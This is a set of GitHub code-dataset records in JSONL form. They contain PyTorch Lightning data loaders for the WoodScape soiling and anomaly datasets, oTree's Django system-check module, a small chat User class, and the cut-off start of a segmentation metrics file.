random.seed(self.seed)\n random.shuffle(indices)\n # split dataset into train subset and test set:\n split = int(np.floor(self.test_size * dataset_len))\n train_ss_idx, test_idx = indices[split:], indices[:split]\n # split train subset into train set and validation set:\n train_set_len = len(train_ss_idx)\n split_train = int(np.floor(self.valid_size * train_set_len))\n train_idx, valid_idx = train_ss_idx[split_train:], train_ss_idx[:split_train]\n # define samplers for obtaining training and validation batches\n self.train_sampler = SubsetRandomSampler(train_idx)\n self.valid_sampler = SubsetRandomSampler(\n valid_idx\n ) # Sampler is useful for woodscape_ds_valid\n self.test_sampler = SubsetRandomSampler(test_idx)\n\n # Assign test dataset for use in dataloader(s)\n if stage == \"test\" or stage is None:\n pass\n # dataset_test = WoodScapeDataset(dataset_dir=self.dataset_dir)\n # TODO: add test set when available from data provider\n\n def train_dataloader(self) -> DataLoader:\n woodscape_train_loader = DataLoader(\n self.woodscape_ds_train,\n batch_size=self.batch_size,\n sampler=self.train_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n self.train_loader_len = len(woodscape_train_loader)\n return woodscape_train_loader\n\n def val_dataloader(self) -> DataLoader:\n woodscape_valid_loader = DataLoader(\n self.woodscape_ds_valid,\n batch_size=self.batch_size,\n sampler=self.valid_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n self.valid_loader_len = len(woodscape_valid_loader)\n return woodscape_valid_loader\n\n def test_dataloader(self) -> DataLoader:\n # TODO: add test dataloader when available from data provider\n woodscape_test_loader = DataLoader(\n self.woodscape_ds_train,\n batch_size=self.batch_size,\n sampler=self.test_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n self.test_loader_len = len(woodscape_test_loader)\n return woodscape_test_loader\n\n def anomaly_val_dataloader(self) -> DataLoader:\n ws_anomaly_valid_loader = DataLoader(\n self.woodscape_anomaly_ds,\n batch_size=self.batch_size,\n sampler=self.valid_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n self.anomaly_valid_loader_len = len(ws_anomaly_valid_loader)\n return ws_anomaly_valid_loader\n\n def anomaly_test_dataloader(self) -> DataLoader:\n # TODO: add test dataloader when available from data provider\n ws_anomaly_test_loader = DataLoader(\n self.woodscape_anomaly_ds,\n batch_size=self.batch_size,\n sampler=self.test_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n self.anomaly_test_loader_len = len(ws_anomaly_test_loader)\n return ws_anomaly_test_loader\n\n def _default_img_transforms(self):\n woodscape_img_transforms = transforms.Compose(\n [\n transforms.Resize(self.img_size),\n transforms.ToTensor(),\n transforms.Normalize(mean=self.norm_mean, std=self.norm_std),\n ]\n )\n return woodscape_img_transforms\n\n def _default_label_transforms(self):\n woodscape_label_transforms = transforms.Compose([transforms.Resize(self.img_size)])\n return woodscape_label_transforms\n\n def _train_default_img_mask_transforms(self) -> Callable:\n woodscape_train_img_mask_transforms = A.Compose(\n [\n A.Resize(self.img_size[0], self.img_size[1], p=1.0),\n # A.OneOf([\n # A.Resize(self.img_size[0], self.img_size[1], p=1.0),\n # A.RandomResizedCrop(self.img_size[0], self.img_size[1], p=1.0),\n # ], p=1.0),\n # A.Resize(self.img_size[0], self.img_size[1]),\n # # A.RandomResizedCrop(self.img_size[0], self.img_size[1], p=1),\n A.OneOf(\n [\n A.RandomResizedCrop(self.img_size[0], self.img_size[1], p=0.5),\n A.HorizontalFlip(p=0.5),\n A.HueSaturationValue(p=0.5),\n A.RandomBrightnessContrast(p=0.5),\n ],\n p=0.5,\n ),\n A.Normalize(mean=self.norm_mean, std=self.norm_std),\n ToTensorV2(),\n ]\n )\n\n return woodscape_train_img_mask_transforms\n\n def _val_default_img_mask_transforms(self) -> Callable:\n woodscape_val_img_mask_transforms = A.Compose(\n [\n A.Resize(self.img_size[0], self.img_size[1]),\n A.Normalize(mean=self.norm_mean, std=self.norm_std),\n ToTensorV2(),\n ]\n )\n\n return woodscape_val_img_mask_transforms\n\n def _anomaly_transforms(self) -> Callable:\n woodscape_anomaly_transforms = A.Compose(\n [\n A.Resize(self.img_size[0], self.img_size[1], p=1),\n A.OneOf(\n [\n AnomalyMud(\n anomaly_width=self.img_size[1], anomaly_height=self.img_size[0], p=1\n ),\n A.RandomFog(fog_coef_lower=0.7, fog_coef_upper=0.8, alpha_coef=0.6, p=1),\n A.RandomSunFlare(\n flare_roi=(0.2, 0.2, 0.8, 0.8),\n src_radius=int(self.img_size[1] * 0.7),\n num_flare_circles_lower=6,\n num_flare_circles_upper=12,\n angle_lower=0.5,\n p=1,\n ),\n ],\n p=1,\n ),\n A.Normalize(mean=self.norm_mean, std=self.norm_std),\n ToTensorV2(),\n ]\n )\n return woodscape_anomaly_transforms\n\n def unprocess_image(self, im, return_array=True):\n # im = im.squeeze().numpy().transpose((1, 2, 0))\n im = im.squeeze().numpy().transpose((1, 2, 0))\n im = self.norm_std * im + self.norm_mean\n im = np.clip(im, 0, 1)\n im = im * 255\n im = im.astype(np.uint8)\n if return_array:\n return im\n else:\n return PIL.Image.fromarray(im)\n\n\nclass WoodScapeSoilingDataset(Dataset):\n def __init__(\n self,\n dataset_dir: str,\n train: bool = True,\n img_size: tuple = (150, 300),\n default_transforms=False,\n img_transforms=None,\n label_transforms=None,\n ) -> None:\n super().__init__()\n self.class_names = [\"clear\", \"transparent\", \"semi_transparent\", \"opaque\"]\n\n self.n_classes = 4\n\n self.class_colors_rgb = [[0, 0, 0], [0, 255, 0], [255, 0, 0], [0, 0, 255]] # RGB format!\n\n self.class_colors_bgr = [[0, 0, 0], [0, 255, 0], [0, 0, 255], [255, 0, 0]] # BGR format!\n\n self.label_colours = dict(zip(range(4), self.class_colors_rgb))\n self.class_indexes = [0, 1, 2, 3]\n\n self.dataset_dir = dataset_dir\n self.train = train\n\n if self.train:\n self.dataset_dir = os.path.join(self.dataset_dir, \"train\")\n else:\n self.dataset_dir = os.path.join(self.dataset_dir, \"test\")\n\n self.rgb_soil_images_dir = os.path.join(self.dataset_dir, \"rgbImages\")\n self.rgb_soil_images_list = glob.glob(os.path.join(self.rgb_soil_images_dir, \"*.png\"))\n self.rgb_soil_images_list.sort()\n ic(len(self.rgb_soil_images_list))\n\n self.soil_annotations_gt_dir = os.path.join(self.dataset_dir, \"gtLabels\")\n self.soil_annotations_gt_list = glob.glob(\n os.path.join(self.soil_annotations_gt_dir, \"*.png\")\n )\n self.soil_annotations_gt_list.sort()\n ic(len(self.soil_annotations_gt_list))\n\n self.soil_annotations_rgb_dir = os.path.join(self.dataset_dir, \"rgbLabels\")\n self.soil_annotations_rgb_list = glob.glob(\n os.path.join(self.soil_annotations_rgb_dir, \"*.png\")\n )\n self.soil_annotations_rgb_list.sort()\n ic(len(self.soil_annotations_rgb_list))\n\n self.img_size = img_size\n if self.img_size is None:\n self.img_size = (150, 300)\n\n self.default_transforms = default_transforms\n\n if self.default_transforms:\n self.img_transforms = transforms.Compose(\n [\n transforms.Resize(self.img_size),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.32757252, 0.33050337, 0.33689716],\n std=[0.20290555, 0.20525302, 0.2037721],\n ),\n ]\n )\n self.label_transforms = transforms.Compose([transforms.Resize(self.img_size)])\n else:\n self.img_transforms = img_transforms\n self.label_transforms = label_transforms\n\n def __len__(self):\n \"\"\"__len__\"\"\"\n return len(self.rgb_soil_images_list)\n\n def __getitem__(self, index):\n # get image path\n img_path = self.rgb_soil_images_list[index]\n gt_label_path = self.soil_annotations_gt_list[index]\n\n image = PIL.Image.open(img_path).convert(\"RGB\")\n gt_label = PIL.Image.open(gt_label_path)\n\n image = self.img_transforms(image)\n image = image.float()\n\n gt_label_np = np.asarray(gt_label)\n gt_label_tensor = torch.LongTensor(np.array(gt_label_np, copy=True))\n gt_label_tensor = gt_label_tensor.unsqueeze(0)\n gt_label_tensor = self.label_transforms(gt_label_tensor)\n\n return image, gt_label_tensor\n\n def decode_segmap(self, temp: np.ndarray):\n temp = temp.squeeze()\n r = temp.copy()\n g = temp.copy()\n b = temp.copy()\n for l in range(0, self.n_classes):\n r[temp == l] = self.label_colours[l][0]\n g[temp == l] = self.label_colours[l][1]\n b[temp == l] = self.label_colours[l][2]\n\n rgb = np.zeros((temp.shape[0], temp.shape[1], 3))\n rgb[:, :, 0] = r / 255.0\n rgb[:, :, 1] = g / 255.0\n rgb[:, :, 2] = b / 255.0\n return rgb\n\n\nclass WoodScapeSoilingDataModule(LightningDataModule):\n name = \"WoodScape-Soiling\"\n extra_args: dict = {}\n\n def __init__(\n self,\n dataset_dir: str,\n num_workers: int = 10,\n batch_size: int = 32,\n valid_size: float = 0.2,\n seed: int = 10,\n img_size: tuple = (150, 300),\n shuffle: bool = False,\n pin_memory: bool = True,\n drop_last: bool = False,\n img_transforms: transforms = None,\n label_transforms: transforms = None,\n default_transforms: bool = False,\n *args: Any,\n **kwargs: Any,\n ):\n super().__init__(*args, **kwargs)\n self.dataset_dir = dataset_dir\n self.num_workers = num_workers\n self.batch_size = batch_size\n self.valid_size = valid_size\n self.default_transforms = default_transforms\n self.seed = seed\n self.img_size = img_size\n self.shuffle = shuffle\n self.pin_memory = pin_memory\n self.drop_last = drop_last\n self.woodscape_soil_ds_train = None\n self.woodscape_soil_ds_valid = None\n self.woodscape_soil_ds_test = None\n self.train_sampler = None\n self.valid_sampler = None\n\n if self.default_transforms:\n self.img_transforms = self._default_img_transforms()\n self.label_transforms = self._default_label_transforms()\n else:\n self.img_transforms = img_transforms\n self.label_transforms = label_transforms\n\n def setup(self, stage: Optional[str] = None) -> None:\n # Assign train/val datasets for use in dataloaders\n if stage == \"fit\" or stage is None:\n self.woodscape_soil_ds_train = WoodScapeSoilingDataset(\n dataset_dir=self.dataset_dir,\n train=True,\n img_size=self.img_size,\n img_transforms=self.img_transforms,\n label_transforms=self.label_transforms,\n )\n # get dataset length\n dataset_train_len = len(self.woodscape_soil_ds_train)\n ic(dataset_train_len)\n\n # get indices\n indices = list(range(dataset_train_len))\n # indices random shuffle\n print(\"DATASET Shuffle Random SEED: \", self.seed)\n random.seed(self.seed)\n random.shuffle(indices)\n # split\n split = int(np.floor(self.valid_size * dataset_train_len))\n train_idx, valid_idx = indices[split:], indices[:split]\n # define samplers for obtaining training and validation batches\n self.train_sampler = SubsetRandomSampler(train_idx)\n self.valid_sampler = SubsetRandomSampler(valid_idx)\n # Assign test dataset for use in dataloader(s)\n if stage == \"test\" or stage is None:\n self.woodscape_soil_ds_test = WoodScapeSoilingDataset(\n dataset_dir=self.dataset_dir,\n train=False,\n img_size=self.img_size,\n img_transforms=self.img_transforms,\n label_transforms=self.label_transforms,\n )\n dataset_test_len = len(self.woodscape_soil_ds_test)\n ic(dataset_test_len)\n\n def train_dataloader(self) -> DataLoader:\n woodscape_soil_train_loader = DataLoader(\n self.woodscape_soil_ds_train,\n batch_size=self.batch_size,\n sampler=self.train_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n return woodscape_soil_train_loader\n\n def val_dataloader(self) -> DataLoader:\n woodscape_soil_valid_loader = DataLoader(\n self.woodscape_soil_ds_train,\n batch_size=self.batch_size,\n sampler=self.valid_sampler,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n return woodscape_soil_valid_loader\n\n def test_dataloader(self) -> DataLoader:\n woodscape_soil_test_loader = DataLoader(\n self.woodscape_soil_ds_test,\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n pin_memory=self.pin_memory,\n drop_last=self.drop_last,\n )\n return woodscape_soil_test_loader\n\n def _default_img_transforms(self):\n woodscape_img_transforms = transforms.Compose(\n [\n transforms.Resize(self.img_size),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.32757252, 0.33050337, 0.33689716],\n std=[0.20290555, 0.20525302, 0.2037721],\n ),\n ]\n )\n return woodscape_img_transforms\n\n def _default_label_transforms(self):\n woodscape_label_transforms = transforms.Compose([transforms.Resize(self.img_size)])\n return woodscape_label_transforms\n\n def unprocess_image(self, im, return_array=True):\n # im = im.squeeze().numpy().transpose((1, 2, 0))\n im = im.squeeze().numpy().transpose((1, 2, 0))\n im = np.array([0.20290555, 0.20525302, 0.2037721]) * im + np.array(\n [0.32757252, 0.33050337, 0.33689716]\n )\n im = np.clip(im, 0, 1)\n im = im * 255\n im = im.astype(np.uint8)\n if return_array:\n return im\n else:\n return PIL.Image.fromarray(im)\n\n\n# Woodscape Unit-Test\ndef main():\n woodscape_ds = WoodScapeDataset(dataset_dir=\"/media/farnez/Data/DATASETS/WoodScape/\")\n print(woodscape_ds.rgb_images_list)\n pass\n\n\n# Woodscape Unit-Test\nif __name__ == \"__main__\":\n main()\n","repo_name":"danielm322/OoO_Detection","sub_path":"examples/dataset_utils/woodscape.py","file_name":"woodscape.py","file_ext":"py","file_size_in_byte":27088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2861150344","text":"import inspect\r\nimport io\r\nimport os\r\n\r\nfrom otree import common_internal\r\nfrom importlib import import_module\r\n\r\nfrom django.apps import apps\r\nfrom django.conf import settings\r\nfrom django.core.checks import register, Error, Warning\r\nimport django.db.models.fields\r\nfrom otree.api import (\r\n BasePlayer, BaseGroup, BaseSubsession, Currency, WaitPage, Page)\r\nfrom otree.common_internal import _get_all_configs\r\nfrom pathlib import Path\r\nimport re\r\n\r\n\r\nclass AppCheckHelper:\r\n \"\"\"Basically a wrapper around the AppConfig\r\n \"\"\"\r\n\r\n def __init__(self, app_config, errors):\r\n self.app_config = app_config\r\n self.errors = errors\r\n\r\n def add_error(self, title, numeric_id: int, **kwargs):\r\n issue_id = 'otree.E' + str(numeric_id).zfill(3)\r\n kwargs.setdefault('obj', self.app_config.label)\r\n return self.errors.append(Error(title, id=issue_id, **kwargs))\r\n\r\n def add_warning(self, title, numeric_id: int, **kwargs):\r\n kwargs.setdefault('obj', self.app_config.label)\r\n issue_id = 'otree.W' + str(numeric_id).zfill(3)\r\n return self.errors.append(Warning(title, id=issue_id, **kwargs))\r\n\r\n # Helper meythods\r\n\r\n def get_path(self, name):\r\n return os.path.join(self.app_config.path, name)\r\n\r\n def get_rel_path(self, name):\r\n basepath = os.getcwd()\r\n return os.path.relpath(name, basepath)\r\n\r\n def get_module(self, name):\r\n return import_module(self.app_config.name + '.' + name)\r\n\r\n def get_template_names(self):\r\n path = self.get_path('templates')\r\n template_names = []\r\n for root, dirs, files in os.walk(path):\r\n for filename in [f for f in files if f.endswith('.html')]:\r\n template_names.append(os.path.join(root, filename))\r\n return template_names\r\n\r\n def module_exists(self, module):\r\n try:\r\n self.get_module(module)\r\n return True\r\n except ImportError as e:\r\n return False\r\n\r\n def class_exists(self, module, name):\r\n module = self.get_module(module)\r\n cls = getattr(module, name, None)\r\n return inspect.isclass(cls)\r\n\r\n\r\n# CHECKS\r\n\r\ndef files(helper: AppCheckHelper, **kwargs):\r\n # don't check views.py because it might be pages.py\r\n for fn in ['models.py']:\r\n if not os.path.isfile(helper.get_path(fn)):\r\n helper.add_error(\r\n 'No \"%s\" file found in game folder' % fn,\r\n numeric_id=102\r\n )\r\n\r\n templates_dir = Path(helper.get_path('templates'))\r\n app_label = helper.app_config.label\r\n if templates_dir.is_dir():\r\n # check for files in templates/, but not in templates/\r\n misplaced_files = list(templates_dir.glob('*.html'))\r\n if misplaced_files:\r\n hint = (\r\n 'Move template files from \"{app}/templates/\" '\r\n 'to \"{app}/templates/{app}\" subfolder'.format(\r\n app=app_label)\r\n )\r\n\r\n helper.add_error(\r\n \"Templates files in wrong folder\",\r\n hint=hint, numeric_id=103,\r\n )\r\n\r\n all_subfolders = set(templates_dir.glob('*/'))\r\n correctly_named_subfolders = set(\r\n templates_dir.glob('{}/'.format(app_label)))\r\n other_subfolders = all_subfolders - correctly_named_subfolders\r\n if other_subfolders and not correctly_named_subfolders:\r\n msg = (\r\n \"The 'templates' folder has a subfolder called '{}', \"\r\n \"but it should be renamed '{}' to match the name of the app. \"\r\n ).format(other_subfolders.pop().name, app_label)\r\n helper.add_error(msg, numeric_id=104)\r\n\r\n\r\nbase_model_attrs = {\r\n 'Player': set(dir(BasePlayer)),\r\n 'Group': set(dir(BaseGroup)),\r\n 'Subsession': set(dir(BaseSubsession)),\r\n}\r\n\r\nmodel_field_substitutes = {\r\n int: 'IntegerField',\r\n float: 'FloatField',\r\n bool: 'BooleanField',\r\n str: 'CharField',\r\n Currency: 'CurrencyField',\r\n type(None): 'IntegerField'\r\n # not always int, but it's a reasonable suggestion\r\n}\r\n\r\n\r\ndef model_classes(helper: AppCheckHelper, **kwargs):\r\n for name in ['Subsession', 'Group', 'Player']:\r\n try:\r\n helper.app_config.get_model(name)\r\n except LookupError:\r\n helper.add_error(\r\n 'MissingModel: Model \"%s\" not defined' % name, numeric_id=110)\r\n\r\n app_config = helper.app_config\r\n Player = app_config.get_model('Player')\r\n Group = app_config.get_model('Group')\r\n Subsession = app_config.get_model('Subsession')\r\n\r\n for Model in [Player, Group, Subsession]:\r\n for attr_name in dir(Model):\r\n if attr_name not in base_model_attrs[Model.__name__]:\r\n try:\r\n attr_value = getattr(Model, attr_name)\r\n _type = type(attr_value)\r\n except AttributeError:\r\n # I got \"The 'q_country' attribute can only be accessed\r\n # from Player instances.\"\r\n # can just filter/ignore these.\r\n pass\r\n else:\r\n if _type in model_field_substitutes.keys():\r\n msg = (\r\n 'NonModelFieldAttr: '\r\n '{} has attribute \"{}\", which is not a model field, '\r\n 'and will therefore not be saved '\r\n 'to the database.'.format(Model.__name__,\r\n attr_name))\r\n\r\n helper.add_error(\r\n msg,\r\n numeric_id=111,\r\n hint='Consider changing to \"{} = models.{}(initial={})\"'.format(\r\n attr_name, model_field_substitutes[_type],\r\n repr(getattr(Model, attr_name)))\r\n )\r\n # if people just need an iterable of choices for a model field,\r\n # they should use a tuple, not list or dict\r\n elif _type in {list, dict, set}:\r\n warning = (\r\n 'MutableModelClassAttr: '\r\n '{ModelName}.{attr} is a {type_name}. '\r\n 'Modifying it during a session (e.g. appending or setting values) '\r\n 'will have unpredictable results; '\r\n 'you should use '\r\n 'session.vars or participant.vars instead. '\r\n 'Or, if this {type_name} is read-only, '\r\n \"then it's recommended to move it outside of this class \"\r\n '(e.g. put it in Constants).'\r\n ).format(ModelName=Model.__name__,\r\n attr=attr_name,\r\n type_name=_type.__name__)\r\n\r\n helper.add_error(warning, numeric_id=112)\r\n # isinstance(X, type) means X is a class, not instance\r\n elif (isinstance(attr_value, type) and\r\n issubclass(attr_value,\r\n django.db.models.fields.Field)):\r\n msg = (\r\n '{}.{} is missing parentheses.'\r\n ).format(Model.__name__, attr_name)\r\n helper.add_error(\r\n msg, numeric_id=113,\r\n hint=(\r\n 'Consider changing to \"{} = models.{}()\"'\r\n ).format(attr_name, attr_value.__name__)\r\n )\r\n\r\n\r\ndef constants(helper: AppCheckHelper, **kwargs):\r\n if not helper.module_exists('models'):\r\n return\r\n if not helper.class_exists('models', 'Constants'):\r\n helper.add_error(\r\n 'models.py does not contain Constants class', numeric_id=11\r\n )\r\n return\r\n\r\n models = helper.get_module('models')\r\n Constants = getattr(models, 'Constants')\r\n attrs = ['name_in_url', 'players_per_group', 'num_rounds']\r\n for attr_name in attrs:\r\n if not hasattr(Constants, attr_name):\r\n msg = \"models.py: 'Constants' class needs to define '{}'\"\r\n helper.add_error(msg.format(attr_name), numeric_id=12)\r\n ppg = Constants.players_per_group\r\n if ppg == 0 or ppg == 1:\r\n helper.add_error(\r\n \"models.py: Constants.players_per_group cannot be {}. You \"\r\n \"should set it to None, which makes the group \"\r\n \"all players in the subsession.\".format(ppg),\r\n numeric_id=13\r\n )\r\n if ' ' in Constants.name_in_url:\r\n helper.add_error(\r\n \"models.py: Constants.name_in_url must not contain spaces\",\r\n numeric_id=14\r\n )\r\n\r\n\r\ndef pages_function(helper: AppCheckHelper, **kwargs):\r\n pages_module = common_internal.get_pages_module(helper.app_config.name)\r\n views_or_pages = pages_module.__name__.split('.')[-1]\r\n try:\r\n page_list = pages_module.page_sequence\r\n except:\r\n helper.add_error(\r\n '{}.py is missing the variable page_sequence.'.format(\r\n views_or_pages),\r\n numeric_id=21\r\n )\r\n return\r\n else:\r\n for i, ViewCls in enumerate(page_list):\r\n # there is no good reason to include Page in page_sequence.\r\n # As for WaitPage: even though it works fine currently\r\n # and can save the effort of subclassing,\r\n # we should restrict it, because:\r\n # - one user had \"class WaitPage(Page):\".\r\n # - if someone makes \"class WaitPage(WaitPage):\", they might\r\n # not realize why it's inheriting the extra behavior.\r\n # overall, I think the small inconvenience of having to subclass\r\n # once per app\r\n # is outweighed by the unexpected behavior if someone subclasses\r\n # it without understanding inheritance.\r\n # BUT: built-in Trust game had a wait page called WaitPage.\r\n # that was fixed on Aug 24, 2017, need to wait a while...\r\n # see below in ensure_no_misspelled_attributes,\r\n # we can get rid of a check there also\r\n if ViewCls.__name__ == 'Page':\r\n msg = (\r\n \"page_sequence cannot contain \"\r\n \"a class called 'Page'.\"\r\n )\r\n helper.add_error(msg, numeric_id=22)\r\n if ViewCls.__name__ == 'WaitPage' and helper.app_config.name != 'trust':\r\n msg = (\r\n \"page_sequence cannot contain \"\r\n \"a class called 'WaitPage'.\"\r\n )\r\n helper.add_error(msg, numeric_id=221)\r\n\r\n if issubclass(ViewCls, WaitPage):\r\n if ViewCls.group_by_arrival_time:\r\n if i > 0:\r\n helper.add_error(\r\n '\"{}\" has group_by_arrival_time=True, so '\r\n 'it must be placed first in page_sequence.'.format(\r\n ViewCls.__name__), numeric_id=23)\r\n if ViewCls.wait_for_all_groups:\r\n helper.add_error(\r\n 'Page \"{}\" has group_by_arrival_time=True, so '\r\n 'it cannot have wait_for_all_groups=True also.'.format(\r\n ViewCls.__name__), numeric_id=24)\r\n # alternative technique is to not define the method on WaitPage\r\n # and then use hasattr, but I want to keep all complexity\r\n # out of views.abstract\r\n elif (\r\n ViewCls.get_players_for_group != WaitPage.get_players_for_group):\r\n helper.add_error(\r\n 'Page \"{}\" defines get_players_for_group, '\r\n 'but in order to use this method, you must set '\r\n 'group_by_arrival_time=True'.format(\r\n ViewCls.__name__), numeric_id=25)\r\n elif issubclass(ViewCls, Page):\r\n pass # ok\r\n else:\r\n msg = '\"{}\" is not a valid page'.format(ViewCls)\r\n helper.add_error(msg, numeric_id=26)\r\n\r\n ensure_no_misspelled_attributes(ViewCls, helper)\r\n\r\n\r\ndef ensure_no_misspelled_attributes(ViewCls: type, helper: AppCheckHelper):\r\n '''just a helper function'''\r\n\r\n # this messes with the logic of base classes.\r\n # do this instead of ViewCls == WaitPage, because _builtin already\r\n # subclasses it, so you would get a warning like:\r\n # Page \"WaitPage\" has the following method that is not recognized by oTree:\r\n # \"z_autocomplete\".\r\n if ViewCls.__name__ == 'WaitPage' or ViewCls.__name__ == 'Page':\r\n return\r\n\r\n # make sure no misspelled attributes\r\n base_members = set()\r\n for Cls in ViewCls.__bases__:\r\n base_members.update(dir(Cls))\r\n child_members = set(dir(ViewCls))\r\n child_only_members = child_members - base_members\r\n\r\n dynamic_form_methods = set() # needs to be a set\r\n for member in child_only_members:\r\n # error_message, not _error_message\r\n for valid_ending in ['error_message', '_min', '_max', '_choices']:\r\n if member.endswith(valid_ending):\r\n dynamic_form_methods.add(member)\r\n invalid_members = child_only_members - dynamic_form_methods\r\n if invalid_members:\r\n ALLOW_CUSTOM_ATTRIBUTES = '_allow_custom_attributes'\r\n if getattr(ViewCls, ALLOW_CUSTOM_ATTRIBUTES, False):\r\n return\r\n\r\n page_attrs = set(dir(Page))\r\n wait_page_attrs = set(dir(WaitPage))\r\n ATTRS_ON_PAGE_ONLY = page_attrs - wait_page_attrs\r\n ATTRS_ON_WAITPAGE_ONLY = wait_page_attrs - page_attrs\r\n\r\n for member in invalid_members:\r\n # this assumes that ViewCls is a Page or WaitPage\r\n if member in ATTRS_ON_PAGE_ONLY:\r\n assert issubclass(ViewCls, WaitPage), (ViewCls, member)\r\n msg = (\r\n 'WaitPage \"{ViewClsName}\" has the attribute \"{member}\" that is not '\r\n 'allowed on a WaitPage. '\r\n )\r\n numeric_id = 27\r\n elif member in ATTRS_ON_WAITPAGE_ONLY:\r\n assert issubclass(ViewCls, Page), (ViewCls, member)\r\n msg = (\r\n 'Page \"{ViewClsName}\" has the attribute \"{member}\" that is '\r\n 'only allowed on a WaitPage, not a regular Page. '\r\n )\r\n numeric_id=271\r\n elif callable(getattr(ViewCls, member)):\r\n msg = (\r\n 'Page \"{ViewClsName}\" has the following method that is not '\r\n 'recognized by oTree: \"{member}\". '\r\n 'Consider moving it into '\r\n 'the Player class in models.py. '\r\n )\r\n\r\n numeric_id=28\r\n else:\r\n msg = (\r\n 'Page \"{ViewClsName}\" has the following attribute that is not '\r\n 'recognized by oTree: \"{member}\". '\r\n )\r\n numeric_id=29\r\n\r\n fmt_kwargs = {\r\n 'ViewClsName': ViewCls.__name__,\r\n 'FLAG': ALLOW_CUSTOM_ATTRIBUTES,\r\n 'member': member,\r\n }\r\n # when i make this an error, should add this workaround.\r\n #msg += 'If you want to keep it here, you need to set '\r\n # '{FLAG}=True on the page class.'\r\n\r\n # at first, just make it a warning.\r\n helper.add_error(msg.format(**fmt_kwargs), numeric_id)\r\n\r\n\r\ndef unique_sessions_names(helper: AppCheckHelper, **kwargs):\r\n already_seen = set()\r\n for st in settings.SESSION_CONFIGS:\r\n st_name = st[\"name\"]\r\n if st_name in already_seen:\r\n msg = \"Duplicate SESSION_CONFIG name '{}'\".format(st_name)\r\n helper.add_error(msg, numeric_id=40)\r\n else:\r\n already_seen.add(st_name)\r\n\r\n\r\ndef unique_room_names(helper: AppCheckHelper, **kwargs):\r\n already_seen = set()\r\n for room in getattr(settings, 'ROOMS', []):\r\n room_name = room[\"name\"]\r\n if room_name in already_seen:\r\n msg = \"Duplicate ROOM name '{}'\".format(room_name)\r\n helper.add_error(msg, numeric_id=50)\r\n else:\r\n already_seen.add(room_name)\r\n\r\n\r\ndef template_encoding(helper: AppCheckHelper, **kwargs):\r\n from otree.checks.templates import has_valid_encoding\r\n for template_name in helper.get_template_names():\r\n if not has_valid_encoding(template_name):\r\n helper.add_error(\r\n 'The template {template} is not UTF-8 encoded. '\r\n 'Please configure your text editor to always save files '\r\n 'as UTF-8. Then open the file and save it again.'\r\n .format(template=helper.get_rel_path(template_name)),\r\n numeric_id=60,\r\n )\r\n\r\n\r\ndef make_check_function(func):\r\n def check_function(app_configs, **kwargs):\r\n # if app_configs list is given (e.g. otree check app1 app2), run on those\r\n # if it's None, run on all apps\r\n # (system check API requires this)\r\n app_configs = app_configs or _get_all_configs()\r\n errors = []\r\n for app_config in app_configs:\r\n helper = AppCheckHelper(app_config, errors)\r\n func(helper, **kwargs)\r\n return errors\r\n\r\n return check_function\r\n\r\n\r\ndef make_check_function_run_once(func):\r\n def check_function(app_configs, **kwargs):\r\n otree_app_config = apps.get_app_config('otree')\r\n # ignore app_configs list -- just run once\r\n errors = []\r\n helper = AppCheckHelper(otree_app_config, errors)\r\n func(helper, **kwargs)\r\n return errors\r\n\r\n return check_function\r\n\r\n\r\ndef register_system_checks():\r\n for func in [\r\n unique_room_names,\r\n unique_sessions_names,\r\n ]:\r\n check_function = make_check_function_run_once(func)\r\n register(check_function)\r\n\r\n for func in [\r\n model_classes,\r\n files,\r\n constants,\r\n pages_function,\r\n template_encoding,\r\n ]:\r\n check_function = make_check_function(func)\r\n register(check_function)\r\n","repo_name":"dcthomas4679/otree","sub_path":"checks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":18602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"19022853203","text":"\"\"\"\n Refering to a \"User\" in a chatting platform.\n\"\"\"\n\n\nclass User:\n\n \"\"\"\n uid: str (some platform may not be pure number)\n name: str\n \"\"\"\n\n def __init__(self, uid = \"\", name = \"\"):\n self.uid = uid\n self.name = name\n\n \n def __eq__(self, other: \"User\"):\n if self is None and other is None:\n return True\n\n if self is None or other is None:\n return False\n \n return self.uid == other.uid","repo_name":"SiriusNEO/Moment","sub_path":"core/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"7306827201","text":"from collections import defaultdict\n\nfrom scipy import spatial\nimport numpy as np\nimport torch.nn.functional as F\nimport torch\nfrom torch import einsum\ndef dice_score_2(prediction, groundtruth):\n prediction = torch.tensor(prediction)\n groundtruth = torch.tensor(groundtruth)\n\n prediction = prediction.clone().detach()\n groundtruth = groundtruth.clone().detach()\n\n inter = prediction*groundtruth\n union = prediction*prediction + groundtruth*groundtruth\n iflat = inter.flatten().sum()\n uflat = union.flatten().sum()\n if (uflat != 0):\n d = 200*(np.float(iflat)/uflat)\n if (uflat == 0):\n d = 100\n return d\ndef threshold_predictions(predictions, thr=0.999):\n thresholded_preds = predictions[:]\n low_values_indices = thresholded_preds < thr\n thresholded_preds[low_values_indices] = 0\n low_values_indices = thresholded_preds >= thr\n thresholded_preds[low_values_indices] = 1\n return thresholded_preds\n\ndef intersection(a, b):\n assert a.shape == b.shape\n assert sset(a, [0, 1])\n assert sset(b, [0, 1])\n return a & b\n\n\ndef union(a, b):\n assert a.shape == b.shape\n assert sset(a, [0, 1])\n assert sset(b, [0, 1])\n return a | b\n\ndef probs2class(probs):\n b, _, w, h = probs.shape # type: Tuple[int, int, int, int]\n assert simplex(probs)\n\n res = probs.argmax(dim=1)\n assert res.shape == (b, w, 